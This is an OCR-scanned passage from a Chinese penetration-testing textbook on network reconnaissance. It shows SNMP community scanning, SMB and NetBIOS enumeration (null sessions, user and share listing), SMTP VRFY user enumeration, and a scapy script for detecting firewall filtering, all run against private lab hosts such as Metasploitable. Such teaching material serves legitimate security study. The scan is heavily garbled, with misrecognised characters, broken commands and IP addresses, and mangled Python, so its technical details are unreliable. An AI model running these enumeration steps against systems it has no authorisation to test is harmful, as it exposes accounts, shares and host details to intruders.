如 果 要 从 另 一 个 位 置 0 一 个 软盘 或 网 络 服务 器 ) 
复制 文件 ,也 可 以 单 击 “ 确 定 ”。 


图 所 示 。 


完成 “Windows 组 件 向 导 ” 


悠 已 成 功 地 元 成 了 Yindows 钼 件 向 导 。 


读 单 击 “完成 ” 素 冻 闭 此 向 于- 
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安装 完成 后 在 服务 中 会 多 出 两 项 基于 
SNMP 的 服务 ， 如 下 图 所 示 。 
管理 此 1 十 算 ,,， 手动 


嫩 85mart Card 
NMP Service 包含 代理 程 ,，， 
幼 %5NMP Trap 5ervice 接收 由 本 地 ,,， 
纺 % 55DP Discovery 5er,,， 启 动 你 家庭,，， 


双击 SNMP Service， 选 择 “ 安 全 ” 
选项 卡 ， 可 以 看 到 默认 配置 是 public 并 且 
接受 来 自任 何 主机 的 SNMP 数 据 包 ， 如 下 图 
所 示 。 


本 地 服务 


本 地 服务 
本 地 服务 


已 启动 ”手动 
已 启动 ”手动 


SNMP Service 的 屋 性 (本 地 计算 机 } 了 |x| 
常规 | 登录 | 恢复 | 代理 | 陷 间 ”安全 | 仿 存 关系 | 
[”” 沪 注 身份 姓 证 陷 虹 人 Ui 
-接受 团体 名 称 辑 
团体 权利 
public 只 读 


添加 巴 ) .| 编辑 全 | 期 聊 色 ) | 


从 接受 来 自任 何 主机 的 SWF 煞 据 包 已) 
一 个 接受 来 自 这 些 主 机 的 5NWE 包 立 ) 


| 


2. onesixtyone 工 具 


onesixtyone 工 具 是 针对 SNMP 进 行 扫 
摘 的 小 工具 ， 使 用 该 工具 可 以 扫 摘 探测 
SNMP。 有 具体 操作 步骤 如 下 : 


使 用 onesixtyone 192.168.1.103 public 
命令 ， 探 测 SNMP， 如 下 图 所 示 。 


root@kali:;~# onesixtyone 1I52.165.I.1563 public 

scanning 1 hosts, 1 communities 

192.168.1.193 [public] Hardware: x86 Family 16 Model 19 Stepping 06 AT/AT 
COMPATIBLE - Software: Windows 2969 Version 5.1 (Build 2606 Uniprocessor 
Free) 


onesixtyone 工 具 支 持 字典 方式 查 
询 ， 因 此 使 用 dpkg -L onesixtyone 命 令 查 
看 它 是 否 自 带 字典 文件 ， 执 行 效 果 如 下 图 
所 示 。 


root@kali:-~# dpkg -L onesixtyone 
/. 

/usr 

/usr/bin 

/usr/bin/onesixtyone 

/usr/share 

/usr/share/doc 
/usr/share/doc/onesixtyone 
/usr/share/doc/onesixtyone/README 
/usr/share/doc/onesixtyone/changelog.Debian.amd64.gz 
/usr/share/doc/onesixtyone/changelog.Debian.gz 
/usr/share/doc/onesixtyone/changelog.gz 
/usr/share/doc/onesixtyone/copyright 
/usr/share/doc/onesixtyone/dict .txt 
/usr/share/man 

/usr/share/man/manl 
/usr/share/man/manl/onesixtyone.1.gz 


如 果 使 用 字典 扫描 ， 可 以 使 用 
onesixtyone -c dirct.txt 192.168.1.103 -o 
my.log -w 100 命 令 ， 其 中 dirct 是 字典 文 


件 ，-o 是 输出 内 容 到 一 个 文件 ，-w 设 置 超时 


时 间 (单位 ms) 。 
倍 注 意 : SNMP 是 明文 传输 ， 因 此 可 以 利 
用 抓 包 来 获得 目标 的 community。 


3. snmpwalk 工 具 


snmpwalk 是 一 个 通过 SNMP GET-NEXT 
类 型 PDU， 实 现 对 目标 agent 的 某 指 定 MIB 
分 文 信息 进行 完整 提取 并 输出 的 工具 。 语 
法 格式 如 下 : 


snmpwalk[ 选 项] agent [oid] 


常用 参数 介绍 如 下 : 


bd —h: 显示 帮助 。 
e -v1l|2c|3: 指定 SNMP 版 本 。 
e -V: 显示 当前 snmpwalk 命 令 行 


版 本 。 
了 : 指定 重 试 次 数 ， 默 认为 0 次 。 
-t: 指定 每 次 请 求 的 等 待 超时 时 间 ， 
单位 s， 默 认为 3s。 
e -Cc: 指定 当 在 WALK 时 ， 如 果 发 现 
负增长 将 是 否 继续 WALK。 
Fededediny tere 
对 比较 多 。 使 用 snmpwalk 192.168.1.103 
-c public -v 2c 命令 ， 由 于 信息 比较 多 ， 这 
里 只 截取 了 其 中 一 部 分 作为 展示 ， 如 下 图 
所 示 。 


root@kali:~# snmpwalk 192.168.1.183 -c¢ public -v Zc 
Created directory: /var/lib/snmp/mib indexes 
iso.3.6.1.2.1.1.1.8 = STRING; "Hardware: x86 Family 16 Model 19 Stepping @ AT/AT 

COMPATIBLE - ea Windows 2600 Version 5.1 (Build 2600 Uniprocessor Free)" 
iso.3.6.1.2.1.1.2.9 = DID: iso.3.6.1.4.1.311.1.1.3.1.1 
re Timeticks: (451478) 1:15:14.78 
Liso.3.6.1.2.1.25.4.2.1.2.1 = STRING: "System Idte Process" 
Ls0.3.6.1.2.1.25.4.2.1.2.4 = STRING: "System" 
is0.3.5.1.,2.1,.25.4.2,1.2,.172 = STRING: "snmp.exe" 
LIso.3.6.1.2.1.25.4.2.1.2.360 = STRING: “smss.exe" 
iso.3.6.1.2.1.25.4.2.1.2.448 = STRING: "logon.scr" 

iso.3.6.1.2.1.25.4.2.1.2.484 = STRING: “mmc .exe" 

jiso.3.6.1.2.1.25.4.2.1.2.508 = STRING: "csrss.exe" 
iso.3.5.1.,2.1.25.4.2,1.2.532 = STRING: "winlogon,.exe”" 
E50.3.6.1.2.1.25.6.3.1.1.1 = INTEGER: 1 

iso0.3.5.1.,2.1.25.5.3,1.2.1 = STRING: "WebFldrs XP" 

rs0.3.6.1.2.1.25.6.3.1.3.1 = 0ID: ccitt.B 

Lis0.3.6.1.2.1.25.6.3.1.4.1 = INTEGER: 4 

到 : 097 E2 QA lA QF 39 30 89 


网 提示 : ISO 后 面 的 数字 便 是 内 部 库 的 ID 


全 9 包括 了 操作 系 统 信 息 AN 进程 信息 AN ™ 硬 
件 信 息 、MAC 地 址 、IP 地 址 等 


snmpwalk 工 具 还 支持 通过 内 部 库 ID 


号 的 形式 得 询 ， 使 用 的 命令 为 snmpwalk -c 
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public -v 2c 192.168.1.1.133 < 具体 ID>。 常 
用 的 方法 总 结 如 下 : 

(1) 使 用 snmpwalk -v 2c -c public 192. 
168.1. 103 .1.3.6.1.2.1.25.1 命令 取得 Windows 
端的 系统 进程 用 户 数 等 ， 其 中 -v 指 版 本 ，-c 
指 密 钥 。 

(2) 使 用 snmpwalk -v 2c -c public 192. 
168.1. 103 .1.3.6.1.2.1.25.2.2 命令 取得 系统 
总 内 存 。 

(3) 使 用 snmpwalk -v 2c -c public 192. 
168. 1.103 hrSystemNumUsers 命令 取得 系统 
用 户 数 。 

(4) 使 用 snmpwalk -v 2c -c public 192. 
168.1. 103 .1.3.6.1.2.1.4.20 命令 取得 卫 信息 。 

(5) 使 用 snmpwalk -v 2c -c public 192. 
168. 1.103 system 命令 查看 系统 信息 。 

(6) 使 用 snmpwalk -v 2c -c public 192. 
168. 1.103 ifDescr 命令 获取 网 卡 信息 。 

snmpwalk 功 能 还 有 很 多 ， 可 以 获取 
系统 各 种 信息 ， 只 要 更 改 后 面 的 信息 类 型 
即 可 ， 如 果 不 知道 什么 类 型 ， 也 可 以 不 指 
定 ， 如 果 不 指 定 将 获取 所 有 信息 。 


4. snmpcheck 工 具 


snmpwalk 显 示 的 信息 非常 多 但 是 不 易 
阅读 ， 而 snmpcheck 会 显示 具体 信息 名 称 
更 方便 使 用 者 阅读 ， 使 用 snmpcheck 要 输入 
snmpcheck 命 令 〈 和 直接 输入 snmpcheck 会 出 
现 图 形 化 工具 ) 。 

使 用 snmpcheck 工 具 的 操作 步骤 如 下 : 
使 用 snmpcheck -h 命 令 ， 打 开 帮 助 信 
息 ， 可 以 查看 参数 信息 ， 但 可 以 看 到 参数 
并 不 多 ， 如 下 图 所 示 。 


root@kali:~# snmpcheck -h 


Usage: snmpcheck [-xj [-nlyl [-h] [-H] [-V NUM] [-L] [-f] [{[-a] HOSTS] 


-h Display this message., 
-a check error log file AND hosts specified on command line. 
-Pp Don't try and ping-echo the host first 
-f only check for things I can fix 
HOSTS check these hosts for problems. 


X 0ptions : 
forces ascii base if $DISPLAY set (instead of tk). 
-H start in hidden mode. (hides user interface) 
-V NUM sets the initial verbosity level of the command log (def: 1) 
-LL Show the log window at startup 
-dg Don't start by checking anything. Just bring up the interface. 


Ascii Options: 
-hn Don't ever try and fix the problems found. Just list. 
-y ALways fix problems found. 
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使 用 snmp-check 192.168.1.103 命 令 ， 
可 以 查看 主机 的 snmp 信 息 。 下 图 为 查询 出 
来 的 主机 系统 信息 。 


[*] System information: 


Host IP address 

Hostname : 111111-9B22E0A4 

Description : Hardware: x86 Family 16 
Model 16 Stepping © AT/AT COMPATIBLE - Software: Windows 
2060 Version 5.1 (Build 2606 Uniprocessor Free) 

Contact ; - 

Location 

Uptime snmp 

Uptime system 

System date 
Domain 


step 图 下 图 为 查询 出 来 的 用 户 信息 。 


[*] User accounts : 


: 192.168.1.103 


: 1 day，65:27:29.84 

: 01:55:48.67 

: 2018-10-28 13:47:59.3 
: WORKGROUP 


Guest 

Administrator 
HelpAssistant 
SUPPORT 388945a0 


下 图 为 查询 出 来 的 网 络 信息 。 


[*] Network inTormation: 

IP forwarding enabled : no 
Default TTL : 128 
TCP segments received : 181 
TCP segments sent : 231 
TCP segments retrans :0 
Input datagrams : 6663 
Delivered datagrams : 6661 
0utput datagrams : 1118 


下 图 为 查询 出 来 的 UDP 端口 开放 


信息 。 


[*] Listening UDP ports : 
Local address Local port 
0.0.0.0 161 
6.0.0.9 162 
0.0.0.0 445 
0.0.0.0 500 
800.0.0.0 4500 
127.0.0.1 123 
i121.0.90.1 1900 
192.168.1.103 123 
192.168.1.103 137 
192.168.1.103 138 
192 .168.1.103 1900 


11.2.4 ”扫描 SMP 协 议 


SMB (Server Message Block) 是 一 个 
协议 名 ， 它 被 用 于 Web 连 接 和 客户 端 与 服务 
器 之 间 的 信息 沟通 ， 其 目的 是 将 DOS 操 作 
系统 中 的 本 地 文件 接口 “中 断 13” 改 造 为 
网 络 文件 系统 。 


1. Nmap 工 具 


使 用 Nmap 工 具 可 以 扫描 SMP 协 议 ， 具 
体操 作 步 又 如 下 : 
使 用 Nmap -vv -p139,445 192.168.1.1- 


200 


200 命 令 ， 可 以 扫描 一 个 网 段 中 开放 了 
139、445 端 口 的 机 器 。 扫 描 出 4 台 机 器 ， 其 
中 各 有 两 台 开 启 了 139、445 端 口 ， 如 下 图 
所 示 。 参 数 -vv 是 显示 更 加 详细 的 信息 。 


canning 4 hosts [2 ports/host] 

iscovered open port 445/tcp on 192.168.1.105 

iscovered open port 445/tcp on 192.168.1.103 

iscovered open port 139/tcp on 192.168.1.105 

iscovered open port 139/tcp on 192.168.1.103 

ompleted SYN Stealth Scan at 02:57，1.245 elapsed (8 total ports 


下 图 为 了 地 址 为 192.168.1.103 的 详细 
信息 


五 vs o 


Nmap scan report for 192.168.1.103 
Host is up, received arp-response (0.900415 Latency) , 
Scanned at 2018-10-28 02:57:24 EDT for 23S 


PORT STATE SERVICE REASON 

139/tcp open netbios-ssn syn-ack ttl 128 
445/tcp open microsoft-ds syn-ack ttl 128 
MAC Address: 00:0C:29:A2:4E:07 (VMware) 


下 图 为 [PP 地址 为 192.168.1.105 的 详细 


和 
E 当 -时 


Nmap Scan report for 192.168.1.1905 
Host is up, received arp-response (606.000385 latency), 
Scanned at 2018-10-28 02:57:24 EDT for 23s 


PORT STATE SERVICE REASON 

139/tcp open netbios-ssn syn-ack ttl 64 
445/tcp open microsoft-ds syn-ack ttL 64 
MAC Address: 00:0C:29:FA:DD:2A (VMware) 


step 了 网 通过 TTL 信 息 可 以 区 分 出 103 是 
Windows 系 统 ，105 是 Linux/Unix 系 统 。 使 用 
Nmap 192.168.1.103 -p139,445 --script=smb- 
os-discovery.nse 命 令 ， 可 以 有 针对 性 地 进行 
扫描 ， 执 行 效果 如 下 图 所 示 。 该 命令 主要 
用 于 确认 开放 了 139、445 端 口 的 设备 是 否 为 
Windows 系 统 ， 可 以 看 到 通过 添加 脚本 ， 再 
进行 扫描 ， 信 息 就 非常 准确 了 。 


root@kali:-# nmap 192.168.1.103 -p139,445 --script=smb-os-discovery.nse 
Starting Nmap 7.76 ( https://Nnmap.org ) at 2618-19-28 83:25 EDT 
Nmap scan report for 192.168,1.103 

Host is up (9.60945s Latency | . 


PORT STATE SERVICE 

139/tcp open netbios-ssn 

445/tcp open microsoft-ds 

MAC Address: Q0:0C:29:MA2:4E:07 (VMware) 


Host script results: 

| Smb-Ds-discovery : 

| 05: Windows XP (Windows 2060 LAN Manager) 

| 0S CPE: cpe:/o:microsoft:windows xp::- 

| Computer name: 111111-9b2z2E6ad4 

| NetBIOS computer name: 111111-9B22E0A4\x80 
| Workgroup: WORKGROUP\XxBE 

| System time: 2018-10-28T15:25:091+08:00 


Nmap done: 1 IP address (1 host up) scanned in 7.52 seconds 


使 用 相同 的 脚本 对 比 扫 描 Linux 系 
统 ， 同 样 可 以 打 描 出 一 些 信 息 ， 如 下 图 
所 示 。 
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root@kali:/usr/share/nmap/scripts# nmap 192.168.1.165 -p139,445 --script=smb-os-discovery.nse 
We Nmap 7.70 ( https://nmap.org ) at 2018-10-28 03:37 EDT 

map scan report for 192.168.1.105 

ost is up (0.000647s Latency |) . 

PORT STATE SERVICE 

139/tcp open netbios-ssn 

A45/tcp open microsoft-ds 

MAC Address: 00:0C:29:FA:DD:2A (VMware) 


Host script results: 

| smb-os-discovery: 

| 0S: Unix (Samba 3.0.20-Debian) 

| NetBIOS computer name: 

| workgroup: WORKGROUPNX69 

| System time: 2018-19-28T103:33:28-04:90 


Nmap done: 1 IP address (1 host up) scanned in 9.85 secords 


人 提示 : 在 Kali 系 统 中 的 usr/share/Nmap/scripts 目 录 下 存放 了 近 600 个 Nmap 的 脚本 文件 ， 如 
下 图 所 示 。 针 对 不 同 的 扫描 都 可 以 找到 相应 的 脚本 文件 。 


Foot@kali:/usr/share/nmap/scripts¥#¥ Ts 


Bcarsd-info.nse http-grep.nse nntp-ntlm-info.nse 
Bddress-info.nse http-headers .nse nping-brute.nse 
pfp-brute.nse http-huawei-hg5xx-vuLn .nse nrpe-enum.nse 
afp-ls.nse http-icloud-findmyiphone.nse ntp-info.nse 
afp-path-vuln.nse http-icloud-sendmsg.nse ntp-monlist.nse 
Bfp-serverinfo.nse http-iis-short-name-brute.nse omp2-brute.nse 
afp-showmount.nse http-iis-webdav-vuln.nse omp2-enum- targets.nse 
Bjp-auth.nse http-internal-ip-disclosure.nse omron-info.nse 
Bjp-brute.nse http-joomla-brute.nse openlooxup-info.nse 
ajp-headers.nse http-jsonp-detection.nse openvas-otp-brute.nse 
Bjp-methods.nse http-litespeed-sourcecode-download.nse openwebnet-discovery.nse 
Bjp-request.nse http-ls.nse oracle-brute.nse 
Allseeingeye-info.nse http-majordomo2-dir-traversal .nse oracle-brute-stealth.nse 
omdp -info ,nse hllp-malwait-hvost .nse oractLe-cnunm-usecrs ,NS 
psn-query .nse http-mcmp .nse oracle-sid-brute.nse 
Buth-owners.nse http-methods .nse oracle-tns-version.nse 
Auth-spoof.nse http-method-tamper.nse ovs-agent-version.nse 
backorifice-brute.nse http-mobileversion-checker.nse p2p-conficker.nse 
Yee ete he lye http-ntlm-info.nse path-mtu.nse 
acnet-info.nse http-open-proxy.nse pcanywhere-brute.nse 
banner .nse http-open-redirect.nse peworx-info.nse 
bitcoin-getaddr.nse http-passwd.nse pgsql-brute.nse 


这 里 给 出 一 个 通过 脚本 扫描 ， 来 判断 主机 是 否 存在 smb 漏 洞 ， 下 面 是 脚本 当中 给 出 的 
参考 方式 。 另 外 只 作为 测试 使 用 ， 脚 本 扫描 可 能 会 损毁 主机 系统 。 


-— Nmap --script Smb-vuln-ms06-025 .nSe -p445 <host> 
-Nmap =sU ——3cript smb vuln ms06 025.ns3e pp U:1371 .T1339 <host> 


上 述 脚本 中 会 有 使 用 方法 的 详细 描述 ， 除 此 之 外 还 会 给 出 该 脚本 针对 哪些 漏洞 进行 了 
扫描 。 


2. nbtscan 工 具 


使 用 nbtscan 工 具 进 行 扫 描 的 方法 为 : 使 用 nbtscan -r 192.168.1.0/24 命 令 进行 扫描 ， 执 
行 效果 如 下 图 所 示 。 


root@kali:~# nbtscan -r 192.168.1.0/24 
Doing NBT name scan for addresses from 192.168.1.0/24 


IP address NetBIOS Name Server User MAC address 
192.168.1.0 Sendto failed: Permission denied 

192 .168.1.101 <Unknown> <Unknown> 

192 .168.1.103 111111-9B22E6A4 <server> <Unknown> 00:0c:29:a2:4e:07 


192.168.1.105 METASPLOITABLE <server> METASPLOITABLE 00:00:00:00:060:090 


nbtscan 的 优势 在 于 如 果 网 络 防火 墙 规 则 设置 不 严谨 ， 它 可 以 实现 跨 网 段 扫 描 ， 例 如 : 
主机 地 址 为 -192.168.1.101， 目 标 主 机 地 址 为 -192.168.2.102， 此 时 使 用 nbtsan 可 以 实现 跨 网 
段 扫 描 。 
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3. enum4linux 工 具 


使 用 enum4linux 工 具 进 行 扫 描 的 操作 步骤 如 下 : 
[step 图 使 用 enum4linux -a 192.168.1.103 命 令 ， 扫 描 Windows 系 统 ， 执 行 效果 如 下 图 所 示 。 


root@kali:-# enum4linux -a 132.168.1.103 
starting enum4linux ve.8.9 ( http://labs.portcullis,co.uk/application/enum4linux/ ) on Sun Oct 28 64:25:64 2018 


| Target Information | 


| 192 .168.1.1693 

RID Range ........ 500-550,19500-1950 

Username ......... 1 1 

Password ......... Ee 

Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none 


[step 图 在 扫描 结果 中 ， 查 询 基 于 SMP 协 议 开 启 了 哪些 服务 ， 如 下 图 所 示 。 


Looking up status of 192.168.1.103 


111111-9B22E0A4 <00> - B <ACTIVE> Workstation Service 
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name 
111111-9B22E0A4 <20> - B <ACTIVE> File Server Service 
WORKGROUP <le> - <GROUP> B <ACTIVE> Browser Service Elections 


MAC Address = 00-0C-29-A2-4E-07 


step 国 使 用 enum4linux 工 具 尝 试 建立 空 连接 ， 执行 效果 如 下 图 所 示 。 如 果 存 在 空 连接 这 


+] Server 192.168.1.103 allows sessions using USername '', password ' 


使 用 enum4linux 工 具 扫 描 Linux 系 统 ， 执 行 效果 如 下 图 所 示 。 


Foot@kali:-# enum4linux -a 192.168.1.105 
btarting enum4Linux ve.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Oct 28 64:34:13 2018 


Farge 廿 。。。。。。。。。。。 192.168.1.185 

RID Range ........ 566-558,1999-1950 

Username ,.,........ 1 

Password ......... 

Known Usernames .. administrator, quest, krbtat, domain admins, root, bin, none 


查询 扫描 结果 中 ， 基 于 SMP 协 议 开 居 了 哪些 服务 ， 如 下 图 所 示 。 


Looking up status of 192.168.1.105 

METASPLOITABLE <00> - B <ACTIVE> Workstation Service 

METASPLOITABLE <03> - B <ACTIVE> Messenger Service 

METASPLOITABLE <20> - B <ACTIVE> File Server Service 
MSBROWSE . <01> - <GROUP> B <ACTIVE> Master Browser 


WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name 
WORKGROUP <1d> - B <ACTIVE> Master Browser 
WORKGROUP <le> - <GROUP> B <ACTIVE> Browser Service Elections 


MAC Address = 6080-00-060-00-060-00 


[step 图 查询 扫描 结果 中 ， 扫 描 出 来 的 系统 信息 ， 如 下 图 所 示 。 


Use of uninitialized value $os info in concatenation (.) or String at .Venum4Linux.pPL Line 464, 
并 Got 05 info for 192.168.1.105 from smbclient: 

+] Got 05 info for 192.168.1.165 from srvinfo: 

METASPLOITABLE Vk Sv PrQ Unx NT SNT metasploitable server (Samba 3.0.2D-Debian) 


platform id : 500 
05s Verslon - 4.9 
server type 2 Ox9a03 


[step 国 查询 扫描 结果 中 ， 扫 描 出 来 的 用 户 相 关 信息 。 这 里 只 截取 了 其 中 部 分 信息 ， 如 下 图 
ry 
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index: 9xl RID: Ox3f2 acb: Ox00000011 Account: games Name: games Desc: (null) 
index: Ox2 RID: Ox1f5 acb: Ox00000011 Account: nobody Name: nobody Desc: (null) 
index: QOx3 RID: QOx4ba acb: 0x00000011 Account: bind Name: (null) Desc: (null) 
index: 9x4 RID: 9x402 acb: Ox00000011 Account: proxy Name: proxy Desc: (null) 
index: 9x5 RID: Ox4b4 acb: Ox00000011 Account: syslog Name: (null) Desc: (null) 
index: Qx6 RID: Oxbba acb: OQx00000010 Account: user Name: just a USser,111,，Desc: (null) 
index: Ox7 RID: 0x42a acb: Ox00000011 Account: www-data Name: www-data Desc: (null) 
index: QOx8 RID: 0x3e8 acb: 0x00000011 Account: root Name: root Desc: (null) 
index: QOx9 RID: QOx3fa acb: 0x00000011 Account: news Name: news Desc: (null) 


[step 较 查询 扫描 结果 中 ， 设 备 开 启 的 共享 ， 如 下 图 所 示 。 


| Share Enumeration on 192.168.1.105 | 


Sharename Type Comment 

prints$ Disk Printer Drivers 

tmp Disk oh noes! 

opt Disk 

IPC$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian)) 
ADMINS IPC IPC Service (metasploitable server (Samba 3.0.20-Debian)) 


econnecting with SMB]1 for workgroup listing. 


Server Comment 


[step 图 查询 扫描 结果 中 ， 探 测 出 了 存在 哪些 共享 路 径 ， 哪 些 可 以 访问 ， 如 下 图 所 示 。 


[+] Attempting to map shares on 192.168.1.105 
/7/192.168.1.105/print$ Mapping: DENIED, Listing: N/A 
//192.168.1.105/tmp Mapping: OK, Listing: OK 
//192.168.1.105/o0opt Mapping: DENIED, Listing: N/A 
//192.168.1.105/IPC$ [E] Can't understand response : 
NT _ STATUS NETWORK ACCESS DENIED Listing \* 
//192.168.1.105/ADMIN$ Mapping: DENIED, Listing: N/A 


全 注意 : 在 扫描 结果 中 ， 还 有 一 些 其 他 信息 ， 这 里 不 再 一 一 列 出 。 


11.2.5 扫 摘 SMTP 


扫描 SMTP 最 主要 的 作用 是 发 现 目 标 主机 上 的 邮件 账号 ， 通 过 主动 对 目标 的 SMTP 
《邮件 服务 器 ) 发 动 扫 描 ， 发 现 可 能 存在 的 漏洞 并 收集 邮件 账号 等 信息 。 用 户 可 以 通过 抓 
包 或 者 字典 枚 举 的 方式 发 现 账号 。 
使 用 Nmap 工 具 可 以 进行 SMTP 扫 描 ， 有 具体 的 方法 为 : 使 用 Nmap --script smtp-enum- 
users.nse [--script-args smtp-enum-users.methods=VRFY -p 25,465,587 192.168.1.105 命 令 ， 对 
邮件 服务 器 尝试 用 户 账号 扫描 ， 执 行 效果 如 下 图 所 示 。 


map done: 1 IP address (1 host up) scanned in 1.30 seconds 

root@kali:-~# nmap --script smtp-enum-users.nse [--script-args smtp-enum-users.methods= 
RFY -p 25,465,587 192.168.1.105 

tarting Nmap 7.70 ( https://nmap.org ) at 2018-10-28 64:58 EDT 

Failed to resolve "[--script-args". 

Failed to resolve "smtp-enum-users.methods=VRFY". 

map scan report for 192.168.1.165 

ost is Up (0.00065s Latency ) . 


ORT STATE SERVICE 

5/tcp open smtp 

| smtp-enum-users: 

| Method RCPT returned a unhandled status code. 
65/tcp closed smtps 

87/tcp closed submission 

AC Address: O80:0C:29:FA:DD:2A (VMware) 


map done: 1 IP address (1 host Up) scanned in 6.70 seconds 


以 上 命令 还 可 以 加 入 一 个 账号 字典 来 进行 扫描 ， 命 令 为 Nmap --script smtp-enum- 
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users.nse [|--script-args smtp-enum-users. 
methods=VRFY -u user.txt-p 23,463,387 
192.168.1.105。 其 中 ，-u 参 数 指定 用 户 名 字 
典 文件 。 


11.2.6 ”探测 主机 防火 墙 


通过 对 数据 包 的 发 送 ， 并 检查 返回 
数据 包 ， 可 以 推断 出 哪些 端口 是 被 防火 墙 
过 滤 了 。 这 个 只 能 作为 一 种 推断 结果 ， 会 
存在 一 定 误 差 。 探 测 规则 第 一 次 发 送 SYN 
包 ， 第 二 次 发 送 ACK 包 ， 总 体会 存在 以 下 4 
种 情况 : 

第 1 种 : 发 送 SYN 包 没有 返回 ， 发 送 
ACK 包 回复 RST， 存 在 过 滤 。 

第 2 种 : 发 送 SYN 包 回复 SYN/ACK 或 
者 SYN/RST， 发 送 ACK 包 不 回复 ， 存 在 
过 滤 。 

第 3 种 : 发 送 SYN 包 回复 SYN/ACK 或 
者 SYN/RST， 发 送 ACK 包 回复 RST， 可 能 
是 开放 状态 ， 不 存在 过 滤 。 

第 4 种 : 发 送 的 数据 包 均 无 回应 ， 端 口 
关闭 状态 。 


1. scapy 工 具 


给 出 一 段 脚 本 ， 使 用 该 脚本 推断 端口 
是 否 被 防火 墙 过 滤 。 具 体 代码 如 下 : 


#!/usr/bin/python 
from scapy.all import* 
import logging 
logging.getLogger("scapy.runtime"). 
setLevel (logging .ERROR) 
from scapy.all import* 
if len(sys.argv) !=3: 
print "Usade 有 
[Target IP] [Target Port]" 
Drint “Example 
由 号 己 1 a ey | be 
print"Example will perform if filtering 
exlsts on port 0 of host 19-166 
SYS .exit() 


SR I 


ip = sys.argv[1]  # 获 取 IP 地 址 

port = int(sys.argqv[2]) # 获 取 端 口 

# 构 建 ACK 数 据 包 

ACK response = srl(IP(dst=ip)/TCP (dp 
ort=port,flags="A'),timeout=1,vVverbose=0) 
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# 构 建 SYN 数 据 包 

SYN response= srl (IP(dst=ip)/TCP (dpo 
rt=port,flags="'S"'),timeout=]1,verbose=0) 

# 如 果 ACK、SYN 包 返回 都 是 空 端口 关闭 状态 

if ((ACK reSsponse==None)and(SYN 
response==None)): 

print"Port is either unstatefulty 

filtered or host is down" 

# 如 果 ACK 或 者 SYN 两 个 返回 值 有 一 个 为 空 ， 并且 
不 是 两 个 返回 值 不 同时 为 空 

elif ((ACK response==None)or(SYN 
response==None)) (ALACK, 
response==None)and(SsSYN response==None)): 


and nak 


print "Stateful filtering in place" 


# 存 在 过 滤 
二 
flags)==18: # 回 复 SYN/ACK 端 口 开 放 


print "Pot is unfiltered and open" 


二 
flags)==20: # 回 复 RST/ACK 端 口 关 闭 
print “Port 49 Unfiltered and 
closed" 
else: 


print "Unable to determine if the 


# 其 余 情 况 存在 过 滤 


port is filtered" 


2. Nmap 工 具 


使 用 Nmap 工 具 对 防火 墙 进行 扫描 ， 具 
体操 作 步 又 如 下 : 
扫描 80 端 口 ， 使 用 Nmap -SA 192. 
168.1.1 -p 80 命 令 。 执 行 效果 如 下 图 所 示 ， 
可 以 看 到 80 端 口 没有 被 过 滤 。 


root@kali:~/Test/Service# nmap -SA 192.168.1.1 -p 806 
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-28 06:07 EDT 
Nmap Scan report for 192.168.1.1 
Host is up (6.00054s Latency 1 . 


PORT STATE SERVICE 
BO/tcp unfiltered http 
MAC Address: 1C:FA:68:91:2F:08 (Tp-link Technologies) 


Nmap done: 1 IP address (1 host up) scanned in 0.24 seconds 


扫描 其 他 端口 ， 如 果 使 用 Nmap -SA 
192.168.1.1 -p 445 人 命令， 执行 效果 如 下 图 所 
示 ， 可 以 看 到 445 端 口 存在 过 滤 ， 并 给 出 了 
相应 的 提示 信息 。 


root@kali:~/Test/Service# nmap -SA 192.168.1.1 -p 445 
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-28 096:07 EDT 
Nmap scan report for 192.168.1.1 
Host is up (6.00032s Latency 1 . 


PORT STATE SERVICE 
445/tcp filtered microsoft-ds 
MAC Address: 1C:FA:68:01:2F:098 (Tp-link Technologies) 


Nmap done: 1 IP address (1 host up) scanned in 0.42 seconds 


练 1 一 一 扫 拉 目标 主机 的 开放 端口 


流光 扫 摘 颖 是 一 球 非 常 出 名 的 中 文 多 
功能 专业 扫描 右 ， 其 功能 强大 、 扫 描 速 度 
快 、 可 靠 性 强 ， 为 广大 黑客 迷人 和 们 所 钟爱 。 
利用 流光 扫 摘 堪 可 以 轻松 探测 目标 主机 的 
开放 端口 。 下 面 将 以 探测 POP3 主 机 的 开放 
端口 为 例 进行 介绍 。 

单 击 桌面 上 的 流光 扫描 器 程序 图 标 ， 
启动 流光 扫描 器 ， 如 下 图 所 示 。 


11.3 
实战 演 


四 小 检 次 件 - [ 琉 光 5.0】 Build 3310 (0 用 户 ) 一 口 X 
文 位 [和 蘑 后 IE] 坦 吾 (W 。 么 测 IR) 这 项 [0] 工具 (D 帮助 (H) 关于 [A) 
探 串 记录 查找 ; 了 | 


办 


共 小样 坎 件 实 难 宝 1935-2002 小 痪 作品 板 权 斯 在 


用 户 名 | 让 如 | 主机 


| 用 户 划 缮 和 探 风速 度 

单 击 “ 选 项 ”一 “系统 设置 ”菜单 
命令 ， 打 开 “ 系 统 设 置 ” 对 话 框 ， 对 优先 
级 、 线 程 数 、 单 词 数 /线程 及 扫描 端口 进行 
设置 ， 如 下 图 所 示 。 


系统 设置 
线程 设置 端口 
较 高 80 3 POP3: HTTP: |80 


em | 时 , FTP: 21 SMTP:; [25 


PROXY [8080 ”SQL [1433 


T. 


优先 级 绪 程 数 “单词 数 / 怠 程 


号 自动 调整 线程 设置 | 确定 (0) | | 取消 | 
在 扫描 器 主 窗 口中 选中 “HTTP 主 
Pr 
单 中 选择 “编辑 ”一 “添加 ”选项 ， 如 下 
图 所 示 。 
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四 小 想 软 件 - [这 六 5.0】 Build 3310 (0 用 户 ) 一 口 X 
文 侍 [。 掀 霹 IE] 坦 吾 (V)。 碌 测 IR) 这 项 IO] 工具 MT 帮助 (H) 关于 [A) 
探 串 记 录 查 拱 ; 


忆 - 回 题 目标 主机 
口 闻 FOF5 主 机 
:~… 口 IMAP 主机 


口 rrcs 主 or 


Dg 解答 字典 9 人 > . ev Ror ~ 
主机 | 控 斌 
衬 作 ， 草 除 全 部 用 户 

区 小 榨 榨 件 实 膏 室 1935-2002 小 榴 作 品 板 权 所 有 
用 户 吕 EF 下 | 主机 
二 
| + 用 户 单词 0 摊 列 囊 度 


打开 “添加 主机 (HTTP) ”对 话 
